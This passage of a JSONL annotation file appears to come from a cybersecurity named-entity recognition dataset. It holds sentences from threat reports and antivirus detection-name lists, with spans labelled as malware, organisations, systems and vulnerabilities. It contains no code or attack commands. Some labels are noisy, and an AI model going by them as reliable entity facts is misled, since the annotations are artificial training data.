Trojan/Win32.BitcoinMiner.C2186503 Trojan.CoinMiner Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000475", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HackTool.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9641 Hacktool.Msil.Flooder!c HackTool.Win32.Oylecann HackTool/MSIL.Flooder HackTool:Win32/Oylecann.A Win32/Trojan.Flooder.211", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000476", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Wisdwsl.Trojan Worm.Necast.FC.76 Backdoor.W32.Delf.lrP1 Trojan.MSIL.Cryptos Trojan.Win32.Infexor.cwybmt BackDoor.Infexor.77 Backdoor/MSIL.vy Trojan/Win32.Unknown Trojan.MSIL.Androm.3 Trojan/Win32.Cryptos.R67663 Trojan.Cryptos!GHq1HMEra4U Virus.ILCrypt MSIL/Dropper.XT!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000477", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Flooder.ICMP.Angryping.A Trojan/W32.Flooder.18432.B Trojan.Flooder.ICMP.Angryping.A Trojan/Flooder.AngryPing Win32.Trojan.WisdomEyes.16070401.9500.9978 TROJ_AGPING.A Trojan.Flooder.ICMP.Angryping.A Flooder.Win32.AngryPing Trojan.Flooder.ICMP.Angryping.A Trojan.Win32.AngryPing.fufp Spyware.Flooder.18432 Win32.Trojan.Angryping.Tbis TrojWare.Win32.Flooder.ICMP.A Trojan.Flooder.ICMP.Angryping.A FDOS.Agp Tool.AngryPing.Win32.1 TROJ_AGPING.A BehavesLike.Win32.Koutodoor.lc W32/Risk.MARN-2654 Flooder.ICMP.AngryPing TR/Flood.ICMP.AngryPing HackTool[Flooder]/Win32.AngryPing Win32.Hack.AngryPing.kcloud Trojan.Flooder.ICMP.Angryping.A Flooder.W32.AngryPing!c Flooder.Win32.AngryPing Trojan:Win32/AGPing.A Trojan.Flooder.ICMP.Angryping.A Win32/Flooder.ICMP.AngryPing.A Flooder.ICMP.AngryPing HackTool.Win32.IISCrack W32/AngryPing.A!tr Flooder.AngryPing Flooder/Angryping.B Win32/Trojan.Hack.a29", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000479", "source": "cyner2_valid"}} {"text": "A backdoor also known as: 
Trojan.Taec.FC.1967 Win32.Trojan.WisdomEyes.16070401.9500.9909 Trojan.Win32.Drop.ecxfhb TrojWare.MSIL.Scar.LR Trojan.MulDrop6.38915 Trojan.Tpyn.Win32.33568 Trojan.Win32.Dynamer Troj.Msil.Tpyn!c Trojan:Win32/Dibizor.A!bit Trojan/Win32.Tpyn.R209021 Trojan.Scar Adware.HPDefender Trj/CI.A Win32/Trojan.9a1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000480", "source": "cyner2_valid"}} {"text": "In February 2016, Unit 42 published detailed analysis of Locky ransomware.", "spans": {"Organization: Unit 42": [[18, 25]], "Malware: Locky ransomware.": [[57, 74]]}, "info": {"id": "cyner2_valid_000481", "source": "cyner2_valid"}} {"text": "The attacker decided to prepare 3 different binaries to cover 3 different architectures.", "spans": {}, "info": {"id": "cyner2_valid_000482", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Dacic.FC.1014 Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Win32.Clicker!BT Trojan.MSIL.TrojanClicker Trojan.MSIL.7 TrojanClicker:MSIL/Peadclik.A Trojan.Win32.Clicker!BT Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000483", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Trojan.cc", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000484", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Perl.Shellbot.F Perl/Shellbot.FS Backdoor.Perl.Shellbot.F Perl.Backdoor.Shellbot.f Perl.Pircbot Perl/Shellbot.NAI PERL_SHELLBOT.SM Win.Trojan.IRCBot-785 Backdoor.Perl.Shellbot.F Backdoor.Perl.IRCBot.ml Backdoor.Perl.Shellbot.F Trojan.Script.Shellbot.dnqthd Backdoor.Perl.Shellbot.F Backdoor.Perl.Shellbot.F Perl.Ircbot.142 PERL_SHELLBOT.SM Trojan.XQYH-6 Trojan[Backdoor]/Perl.IRCBot.ml Backdoor:HTML/Derflop.A Backdoor.Perl.Ircbot!c Backdoor.Perl.IRCBot.ml Perl.Backdoor.Ircbot.Lmun Trojan.Perl.Shellbot Perl/ShellBot.NAK!tr", "spans": {"Malware: backdoor": [[2, 
10]]}, "info": {"id": "cyner2_valid_000485", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.RUX.5.0 Backdoor.RUX.5.0 Trojan.Win32.RUX.bmcmu Backdoor.Trojan Win32/RUX.50 BKDR_RUX.C Trojan.RUX.Server Backdoor.Win32.RUX.50 Backdoor.RUX.5.0 Backdoor.RUX!mlwlYwUsz/c Backdoor.Win32.RUX.50.Server Backdoor.RUX.5.0 BackDoor.RUX.50 BDS/RUX.50.Srv BKDR_RUX.C Backdoor/RUX.50 Win32.Hack.RUX.s.kcloud Backdoor:Win32/Rux.5_0 Backdoor.Win32.RUX_50.Svr Win-Trojan/RUX.73728 Backdoor.RUX.5.0 Backdoor.Trojan Win32/RUX.50.Server Backdoor.RUX.50 Backdoor.Win32.RUX.50 W32/BackDoor.Rux.50 BackDoor.RUX Bck/TheTick.50", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000486", "source": "cyner2_valid"}} {"text": "Those apps use the same techniques to monetize their actions .", "spans": {}, "info": {"id": "cyner2_valid_000487", "source": "cyner2_valid"}} {"text": "The malware searches both internal and external storage and encrypts them using RC4 .", "spans": {}, "info": {"id": "cyner2_valid_000488", "source": "cyner2_valid"}} {"text": "The configuration contains a list of steps to execute with URLs and JavaScript .", "spans": {}, "info": {"id": "cyner2_valid_000490", "source": "cyner2_valid"}} {"text": "Furthermore , it can grant the “ com.qualcmm.timeservices ” app Device Administrator rights without any interaction with the user , just by running commands .", "spans": {}, "info": {"id": "cyner2_valid_000491", "source": "cyner2_valid"}} {"text": "leetMX is a widespread cyber-attack campaign originating from Mexico and focused on targets in Mexico, El Salvador, and other countries in Latin America, such as Guatemala, Argentina and Costa Rica.", "spans": {"Malware: leetMX": [[0, 6]]}, "info": {"id": "cyner2_valid_000492", "source": "cyner2_valid"}} {"text": "Creation date is a week before the start of the tournament .", "spans": {}, "info": {"id": "cyner2_valid_000493", "source": "cyner2_valid"}} {"text": "The block is decrypted using a 
customized algorithm that uses a key derived from the original malware dropper ’ s TimeDateStamp field multiplied by 5 .", "spans": {}, "info": {"id": "cyner2_valid_000494", "source": "cyner2_valid"}} {"text": "These events can be based on time , charging or battery status , location , connectivity , running apps , focused app , SIM card status , SMS received with keywords , and screen turning on .", "spans": {}, "info": {"id": "cyner2_valid_000495", "source": "cyner2_valid"}} {"text": "For example , the US ( with around 303k infections ) , Saudi Arabia ( 245k ) , Australia ( 141k ) and the UK ( 137k ) .", "spans": {}, "info": {"id": "cyner2_valid_000496", "source": "cyner2_valid"}} {"text": "The year is 2015 and a threat actor is using the defunct Blackhole exploit kit in active drive-by download campaigns via compromised websites.", "spans": {"Malware: Blackhole exploit kit": [[57, 78]]}, "info": {"id": "cyner2_valid_000497", "source": "cyner2_valid"}} {"text": "However, over the past two weeks we are seeing these malicious VBA macros leveraged to drop Kasidet backdoor in addition to Dridex on the infected systems.", "spans": {"Vulnerability: malicious VBA macros": [[53, 73]], "Malware: Kasidet backdoor": [[92, 108]], "Malware: Dridex": [[124, 130]], "System: infected systems.": [[138, 155]]}, "info": {"id": "cyner2_valid_000498", "source": "cyner2_valid"}} {"text": "When it comes to exploit kits, it's all about the timing.", "spans": {"Malware: exploit kits,": [[17, 30]]}, "info": {"id": "cyner2_valid_000499", "source": "cyner2_valid"}} {"text": "We have found that those computers, used by Odatv journalists Baris Pehlivan and Muyesser Yildiz, were attacked in a relentless and fascinating fashion - ultimately resulting in placement of the incriminating documents just prior to seizure by the Turkish National Police.", "spans": {"System: computers,": [[25, 35]], "Organization: Odatv journalists Baris Pehlivan": [[44, 76]], "Organization: Muyesser Yildiz,": [[81, 
97]], "Organization: the Turkish National Police.": [[244, 272]]}, "info": {"id": "cyner2_valid_000501", "source": "cyner2_valid"}} {"text": "Monitoring Broadcast Events XLoader registers many broadcast receivers in the payload dynamically ( to monitor broadcast events sent between system and applications ) .", "spans": {"Malware: XLoader": [[28, 35]]}, "info": {"id": "cyner2_valid_000502", "source": "cyner2_valid"}} {"text": "In May 2017, Volexity identified and started tracking a very sophisticated and extremely widespread mass digital surveillance and attack campaign targeting several Asian nations, the ASEAN organization, and hundreds of individuals and organizations tied to media, human rights and civil society causes.", "spans": {"Organization: Volexity": [[13, 21]], "Organization: the ASEAN organization,": [[179, 202]], "Organization: individuals": [[219, 230]], "Organization: organizations": [[235, 248]], "Organization: media, human rights": [[257, 276]], "Organization: civil society causes.": [[281, 302]]}, "info": {"id": "cyner2_valid_000503", "source": "cyner2_valid"}} {"text": "They did this at least 5 times between 18 April and 15 May .", "spans": {}, "info": {"id": "cyner2_valid_000504", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Kerlisen Win32.Trojan.WisdomEyes.16070401.9500.9830 Trojan.Win64.Derusbi.evunii Trojan.Win64.Derusbi BDS/Derusbi.vvvng Trj/CI.A W64/Derusbi.AE!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000505", "source": "cyner2_valid"}} {"text": "A backdoor also known as: X97M.Downloader.DQ Trojan.Mdropper X2KM_POWLOAD.AUSUBZY X97M.Downloader.DQ X97M.Downloader.DQ X2KM_POWLOAD.AUSUBZY X97M.Downloader.DQ X97M.Downloader.DQ Macro.Trojan.Dropperx.Auto virus.office.qexvmc.1080", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000506", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Small.44544.QJ Hacktool.Elsashes 
Win32.Trojan.WisdomEyes.16070401.9500.9938 Trojan.PWS.Gamania.35775 W32/Trojan.BEBP-5282 HackTool:Win32/Elsashes.A Adware/Win32.NaviPromo.R36681 Trj/CI.A Virus.Win32.Virut.tv Win32/Trojan.481", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000507", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Zusy.D3615C Win32.Trojan.WisdomEyes.16070401.9500.9574 W32/Zanich.A DDOS_ZANICH.SM Trojan.Win32.Dwn.dmxhxz Trojan.DownLoader12.12365 Backdoor.Klon.Win32.2511 DDOS_ZANICH.SM W32/Trojan.KISP-6625 TR/Crypt.ZPACK.dhukj DDoS:Win32/Zanich.D OScope.Trojan.DClient.2115 Win32/Trojan.fa8", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000508", "source": "cyner2_valid"}} {"text": "Usually , PHA authors attempt to install their harmful apps on as many devices as possible .", "spans": {}, "info": {"id": "cyner2_valid_000511", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Runwaprep.A5 Adware.Amonetize.Win32.18133 Win.Trojan.Graftor-5589 Win32.Trojan.Bayrob.M Trojan.Win32.Symmi.ebmlae TR/Graftor.155364 Trojan.Ursu.D1537 Trojan:Win32/Runwaprep.A Trojan/Win32.Graftor.R181756 Trojan.ATRAPS!SfirfEHIKQo Win32/Trojan.861", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000512", "source": "cyner2_valid"}} {"text": "Using data collected from the Lookout global sensor network , the Lookout research team was able to gain unique visibility into the ViperRAT malware , including 11 new , unreported applications .", "spans": {"Organization: Lookout": [[30, 37]], "Malware: ViperRAT": [[132, 140]]}, "info": {"id": "cyner2_valid_000513", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Heur.Corrupt.PE Trojan[Backdoor]/Win32.Last2000 Backdoor:Win32/Last2000.B.dam#2 Trj/CI.A Backdoor.Win32.Last2000", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000514", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Multi 
Trojan.Win32.Llac.lknx Trojan.Win32.Llac.exokwu Uds.Dangerousobject.Multi!c Tool.PassView.1835 BehavesLike.Win32.Fareit.jc Trojan.Llac.eqh TR/Dropper.MSIL.raxhc TrojanSpy:MSIL/Siplog.B Trojan.Win32.Llac.lknx Trojan/Win32.MSIL.R219591 Spyware.PasswordStealer Trj/GdSda.A Trojan.Inject", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000515", "source": "cyner2_valid"}} {"text": "In our April 2017 posting OilRig Actors Provide a Glimpse into Development and Testing Efforts we showed how we observed the OilRig threat group developing and refining these Clayside delivery documents.", "spans": {}, "info": {"id": "cyner2_valid_000516", "source": "cyner2_valid"}} {"text": "In this context , there is indeed no need to execute the stage 4 malware .", "spans": {}, "info": {"id": "cyner2_valid_000517", "source": "cyner2_valid"}} {"text": "This version appeared as Wabi Music , and copied a popular video-sharing social networking service as its backend login page .", "spans": {}, "info": {"id": "cyner2_valid_000518", "source": "cyner2_valid"}} {"text": "Moreover , there is a special handler for the accelerometer that is able to calculate and log the device ’ s speed : This feature is used in particular by the command “ tk0 ” that mutes the device , disables keyguard , turns off the brightness , uses wakelock and listens to device sensors .", "spans": {}, "info": {"id": "cyner2_valid_000519", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.Gamania.bbzfkj Win32/Gamepass.LKO Trojan.PWS.Gamania.17044 Trojan/PSW.OnLineGames.vyd TrojanDropper:Win32/Lmir.D Win-Trojan/OnlineGameHack.23362 Trojan-Downloader.Win32.Banload Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000520", "source": "cyner2_valid"}} {"text": "This allows the PHA authors to monetize their apps more effectively than through regular advertising .", "spans": {}, "info": {"id": "cyner2_valid_000521", "source": "cyner2_valid"}} {"text": 
"Kaspersky detects and blocks samples of the ViceLeaker operation using the following verdict : Trojan-Spy.AndroidOS.ViceLeaker .", "spans": {"Organization: Kaspersky": [[0, 9]], "Malware: ViceLeaker": [[44, 54]]}, "info": {"id": "cyner2_valid_000522", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.FakeWinLogoA.fam.Trojan Trojan.Win32.VB!O Worm.VB.Win32.7606 Trojan.Gosys.1 Win32.Trojan.WisdomEyes.16070401.9500.9995 WORM_OTORUN.NM Win.Trojan.Kazy-242 Trojan.Win32.VB.asju Trojan.Win32.VB.eaexwa Trojan.Win32.A.VB.36864.ER TrojWare.Win32.Autorun.JT Win32.HLLW.Autoruner.57272 WORM_OTORUN.NM BehavesLike.Win32.Vilsel.cz Virus.Win32.VB Worm/VBNA.hbub Trojan/Win32.VB Worm:Win32/Dodinsom.A IM-Flooder.W32.Delf.l2lu Trojan.Win32.VB.asju Trojan/Win32.VB.R40603 Swisyn.j Trojan.VBRA.02146 Trojan.VB!Uj7xS4Q/gyQ W32/Swisyn.C.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000523", "source": "cyner2_valid"}} {"text": "Recently, we found another unique method being used to deliver malware—abusing the action that happens when simply hovering the mouse's pointer over a hyperlinked picture or text in a PowerPoint slideshow.", "spans": {"Malware: malware—abusing": [[63, 78]]}, "info": {"id": "cyner2_valid_000524", "source": "cyner2_valid"}} {"text": "On attribution Media reporting on ViperRAT thus far attributes this surveillanceware tool to Hamas .", "spans": {"Malware: ViperRAT": [[34, 42]], "Organization: Hamas": [[93, 98]]}, "info": {"id": "cyner2_valid_000525", "source": "cyner2_valid"}} {"text": "Recently the Unit 42 research team have been investigating a wave of Nemucod downloader malware that uses weaponized documents to deploy encoded, and heavily obfuscated JavaScript, ultimately leading to further payloads being delivered to the victim.", "spans": {"Organization: Unit 42 research team": [[13, 34]], "Malware: Nemucod downloader malware": [[69, 95]], "System: JavaScript,": [[169, 180]], "Malware: payloads": [[211, 219]], 
"Organization: victim.": [[243, 250]]}, "info": {"id": "cyner2_valid_000526", "source": "cyner2_valid"}} {"text": "HummingWhale , as the professionally developed malware has been dubbed , is a variant of HummingBad , the name given to a family of malicious apps researchers documented in July invading non-Google app markets .", "spans": {"Malware: HummingWhale": [[0, 12]], "Malware: HummingBad": [[89, 99]]}, "info": {"id": "cyner2_valid_000527", "source": "cyner2_valid"}} {"text": "Download and launch a cryptocurrency mining utility. Attack other computers of the network in order to install its own copy on them.", "spans": {"System: computers": [[66, 75]], "System: network": [[83, 90]]}, "info": {"id": "cyner2_valid_000528", "source": "cyner2_valid"}} {"text": "In our latest discovery, it seems these threat actors are aware of each others activities and are fighting a battle for control of compromised machines.", "spans": {"System: compromised machines.": [[131, 152]]}, "info": {"id": "cyner2_valid_000529", "source": "cyner2_valid"}} {"text": "Targeted e-mails are cheating real people and are sent from domestic free e-mail addresses.", "spans": {}, "info": {"id": "cyner2_valid_000531", "source": "cyner2_valid"}} {"text": "The leaked data alone cannot identify specific individuals targeted by NIS, nor prove misuse of the technology; further investigation and research is necessary to make those determinations.", "spans": {}, "info": {"id": "cyner2_valid_000532", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.VawtrakCS.S452016 Backdoor.Androm.Win32.27664 Trojan/Spy.Shiz.nct BKDR_VAWTRAK_GB280010.UVPM Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Shifu BKDR_VAWTRAK_GB280010.UVPM Trojan.DownLoader17.28491 Backdoor.Win32.Vawtrak Trojan[Backdoor]/Win32.Androm Backdoor.W32.Androm.mAsy Win32.Trojan-Ransom.TeslaCrypt.N Win32/Spy.Shiz.NCT Backdoor.Androm!pk2i4esPAGA W32/Papras.EH!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_valid_000534", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.B9B1 Win32/Sisron.cRTWXW Trojan-Ransom.Win32.Blocker.dafn Trojan.DownLoader10.62041 BehavesLike.Win32.Trojan.cc Trojan/Blocker.acif Trojan[Ransom]/Win32.Blocker Win32.Troj.Undef.kcloud Trojan/Win32.Blocker Trj/CI.A Win32.Trojan.Blocker.Wtdh Backdoor.Win32.Hupigon", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000535", "source": "cyner2_valid"}} {"text": "As seen in Figure 2 , the app tries to open the payload from the /res/raw/ directory and generate an additional Android Package Kit ( APK ) named .app.apk : Decoy Code Figure 2 : The decoy code for the fake TikTok .", "spans": {"System: Android Package Kit": [[112, 131]], "System: TikTok": [[207, 213]]}, "info": {"id": "cyner2_valid_000536", "source": "cyner2_valid"}} {"text": "In our analysis , one activity group stood out : NEODYMIUM .", "spans": {"Malware: NEODYMIUM": [[49, 58]]}, "info": {"id": "cyner2_valid_000537", "source": "cyner2_valid"}} {"text": "Currently , all bespoke apps have been taken down from the Google Play store .", "spans": {"System: Google Play": [[59, 70]]}, "info": {"id": "cyner2_valid_000538", "source": "cyner2_valid"}} {"text": "As it turned out, the email address was similar to Rasul's, but it was not his, and the attachment his friend alluded to contained a virus.", "spans": {"Organization: Rasul's,": [[51, 59]], "Malware: virus.": [[133, 139]]}, "info": {"id": "cyner2_valid_000539", "source": "cyner2_valid"}} {"text": "In addition future Trojans could leverage root exploits to make them almost impossible to remove and give malicious actors the ability to hook generic low level API ’ s that are used by all ( banking ) applications , just like the attack vector as has been used on the desktop platform for years .", "spans": {}, "info": {"id": "cyner2_valid_000540", "source": "cyner2_valid"}} {"text": "In December 2015, Unit 42 published a blog about a cyber 
espionage attack using the Emissary Trojan as a payload.", "spans": {"Organization: Unit 42": [[18, 25]], "Malware: Emissary Trojan": [[84, 99]], "Malware: payload.": [[105, 113]]}, "info": {"id": "cyner2_valid_000541", "source": "cyner2_valid"}} {"text": "A backdoor also known as: VirTool.Obfuscator.AO3 Trojan.MSIL.Androm.9 Backdoor.Trojan Trojan.Win32.Androm.evsiaw BehavesLike.Win32.PUPXBW.wm W32/Trojan.NTQH-5723 TR/Dropper.MSIL.sexdc Backdoor:MSIL/Sisbot.A Trj/GdSda.A MSIL/Dropper.XXX!tr Win32/Backdoor.990", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000544", "source": "cyner2_valid"}} {"text": "Links between XLoader and FakeSpy can give clues to the much broader inner workings of the threat actors behind them .", "spans": {"Malware: XLoader": [[14, 21]], "Malware: FakeSpy": [[26, 33]]}, "info": {"id": "cyner2_valid_000545", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.TanraB.Trojan Trojan.Win32.Clicker!BT Trojan-Clicker.MSIL.Small.dk Trojan.Win32.KillFiles.dztmit Trojan.KillFiles.23773 Trojan.Kazy.D7B695 Trojan-Clicker.MSIL.Small.dk TrojanClicker:MSIL/Redilur.A Trojan/Win32.Asprox.C683680 Trojan.Win32.Clicker!BT Trj/CI.A MSIL/TrojanClicker.Small.NAS MSIL/Small.NAS!tr Win32/Trojan.341", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000546", "source": "cyner2_valid"}} {"text": "Hacking Team has been known to use both CVE-2014-3153 and CVE-2013-6282 in their attacks .", "spans": {"Vulnerability: CVE-2014-3153": [[40, 53]], "Vulnerability: CVE-2013-6282": [[58, 71]]}, "info": {"id": "cyner2_valid_000547", "source": "cyner2_valid"}} {"text": "UDP requires no prior server-side response, further reducing network traffic and malware communication complexity.", "spans": {"System: UDP": [[0, 3]], "System: server-side": [[22, 33]], "System: network traffic": [[61, 76]], "Malware: malware": [[81, 88]]}, "info": {"id": "cyner2_valid_000548", "source": "cyner2_valid"}} {"text": "PIVY has been 
observed targeting a number of Asian countries for various purposes over the past year.", "spans": {"Malware: PIVY": [[0, 4]]}, "info": {"id": "cyner2_valid_000549", "source": "cyner2_valid"}} {"text": "The approach of the Google Play campaigns is different: everything is designed to gain the trust of the user.", "spans": {"System: the Google Play": [[16, 31]]}, "info": {"id": "cyner2_valid_000551", "source": "cyner2_valid"}} {"text": "The infected app steals contacts and SMS messages from the user ’ s device and asks for admin permissions .", "spans": {}, "info": {"id": "cyner2_valid_000552", "source": "cyner2_valid"}} {"text": "This is done in the function initComponents .", "spans": {}, "info": {"id": "cyner2_valid_000553", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/Kryptik.aocd Trojan.Tarctox.1 TROJ_SPNR.35CD13 Win32.Trojan.WisdomEyes.16070401.9500.9854 W32/Trojan.XTKA-9297 TROJ_SPNR.35CD13 Trojan.Win32.Sputnik.bfdeir Backdoor.W32.Sputnik!c TrojWare.Win32.Kryptik.ANIS Trojan.MulDrop4.21354 Trojan.Kryptik.Win32.331530 Trojan.Crypt Backdoor/Sputnik.c Trojan[Backdoor]/Win32.Sputnik TrojanDropper:Win32/Tarctox.B W32/Kryptik.APOJ!tr Win32/Trojan.814", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000554", "source": "cyner2_valid"}} {"text": "Other than that , its major functionality is to collect private device information , upload it to a remote C2 server , and handle any commands as requested by the C2 server .", "spans": {}, "info": {"id": "cyner2_valid_000555", "source": "cyner2_valid"}} {"text": "It is in the run up to this time that most organisations see an increase in targeted attack activity.", "spans": {}, "info": {"id": "cyner2_valid_000556", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Spybot.Worm Win32/Spybot.JB WORM_SPYBOT.L Worm.Win32.SpyBot.MI Win32.HLLW.SpyBot Worm/Spybot.BU WORM_SPYBOT.L Worm.SpyBot.gl.kcloud Win32/SpyBot.worm.30772 Malware-Cryptor.Zhelatin.Net 
Net-Worm.Spybot.C!rem Win32/SpyBot.MI P2P-Worm.Win32.SpyBot.gl", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000557", "source": "cyner2_valid"}} {"text": "This family of malware has a significant history associated with malware distribution.", "spans": {"Malware: This family of malware": [[0, 22]], "Malware: malware": [[65, 72]]}, "info": {"id": "cyner2_valid_000558", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Graftor.D16DB Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.S.Diple.53760 TR/Graftor.5851.A Trojan:Win32/Crix.A Trojan/Win32.Diple.R17533 BScope.Malware-Cryptor.4112 Trj/CI.A Win32/Trojan.7e2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000560", "source": "cyner2_valid"}} {"text": "Once socially engineered users execute the malware variant, their PCs automatically join the botnet operated by the cybercriminals behind the campaign.", "spans": {"Malware: malware": [[43, 50]], "Malware: PCs": [[66, 69]], "Malware: botnet": [[93, 99]]}, "info": {"id": "cyner2_valid_000561", "source": "cyner2_valid"}} {"text": "“ Agent Smith ” currently uses its broad access to the device ’ s resources to show fraudulent ads for financial gain .", "spans": {"Malware: Agent Smith": [[2, 13]]}, "info": {"id": "cyner2_valid_000562", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Chepdu.R Trojan.Chepdu.Win32.496 Trojan/Chepdu.ac Win32.Trojan.WisdomEyes.16070401.9500.9882 Win.Trojan.Chepdu-329 TrojWare.Win32.BHO.SC Trojan:Win32/Chepdu.P TR/Chepdu.IA Trojan/Win32.Unknown Trojan:Win32/Chepdu.V Downloader/Win32.Banload.R8388 Trojan.Chepdu.2 Trojan-Downloader.Win32.Banload", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000563", "source": "cyner2_valid"}} {"text": "How it Works In order to get into the Google Play Store , the malware uses a phased approach which is quite a common practice for malware authors these days .", "spans": {"System: Google 
Play": [[38, 49]]}, "info": {"id": "cyner2_valid_000564", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Hacktool.Vb.CM HackTool.Win32.VB!O HackTool.VB Trojan.Hacktool.Vb.CM Trojan/Hacktool.VB.cm TROJ_VB.CM W32/Tool.JIYM-1294 TROJ_VB.CM Win.Tool.Hot-6 Trojan.Hacktool.Vb.CM HackTool.Win32.VB.cm Trojan.Hacktool.Vb.CM Riskware.Win32.VB.hshn Hacktool.W32.Vb!c Trojan.Hacktool.Vb.CM Trojan.Hacktool.Vb.CM Tool.VB.Win32.1297 BehavesLike.Win32.BadFile.cm HackTool.Win32.VB.CM W32/HackTool.BS HackTool.VB.HotmailCrook Win32.Hack.VB.cm.kcloud Trojan.Hacktool.Vb.CM HackTool.Win32.VB.cm HackTool:Win32/VB.CM Win32.Hacktool.Vb.Akfd HackTool.VB!Lx3YV53UVdw Win32/Trojan.Hacktool.198", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000565", "source": "cyner2_valid"}} {"text": "We at ESET recently discovered an interesting stealth attack on Android users, an app that is a regular game but with one interesting addition: the application was bundled with another application with the name systemdata or resourcea and that's certainly a bit fishy.", "spans": {"Organization: ESET": [[6, 10]], "System: Android users,": [[64, 78]], "System: app": [[82, 85]], "System: regular game": [[96, 108]]}, "info": {"id": "cyner2_valid_000566", "source": "cyner2_valid"}} {"text": "This is a complex campaign that they have called Hiatus", "spans": {}, "info": {"id": "cyner2_valid_000567", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Dropper.TMK Trojan.Scar.bxrc Trojan/Scar.bxrc Trojan.Spawnt.A Win32/AutoRun.NAS W32/Scar.AG W32/NetworkWorm.HZP TROJ_FAM_000007e.TOMA Trojan.Scar-240 Trojan.Win32.Scar.bxrc Trojan.Dropper.TMK TrojWare.Win32.Scar.M Trojan:W32/Scar.M TR/Scar.bxrb TROJ_FAM_000007e.TOMA Trojan.Win32.Scar!IK Win32/Scar.BG W32/Scar.AG Trojan/Scar.twy Trojan:Win32/Spawnt.A Trojan.Win32.Scar.51200.C Trojan.Dropper.TMK Trojan.Win32.Scar.bxrc Trojan.Win32.Scar W32/Scar.C Trj/Downloader.MDW", "spans": {"Malware: backdoor": [[2, 10]]}, 
"info": {"id": "cyner2_valid_000568", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Downloader.JNXM Trojan.Downloader.JNXM Trojan.Downloader.JNXM Trojan.Win32.DownLoad2.dkqeh Trojan.Downloader.JNXM Trojan.Downloader.JNXM Trojan.DownLoad2.19268 BehavesLike.Win32.Dropper.dc Trojan[Downloader:HEUR]/Win32.Unknown Trojan.Downloader.JNXM TrojanDownloader:Win32/Borpe.A Trojan/Win32.Overtls.N205928299 Trojan.Downloader.JNXM W32/Delf.BHO!tr.dldr Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000569", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Ransom.Win32.Foreign!O Trojan.Kazy.D20232 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan-Ransom.Win32.Foreign.xoz Trojan.Win32.Inject.bgixdn Trojan.Winlock.7262 BehavesLike.Win32.ICLoader.cc Trojan-Downloader.Win32.Cbeplay Trojan[Ransom]/Win32.Foreign TrojanDownloader:Win32/Cbeplay.P Trojan-Ransom.Win32.Foreign.xoz Spyware/Win32.Zbot.R47488 TScope.Malware-Cryptor.SB Trojan.FakeMS.ED Trj/Ransom.AB Win32.Trojan.Foreign.cssl Trojan.Foreign!QkpGO9V1pnQ 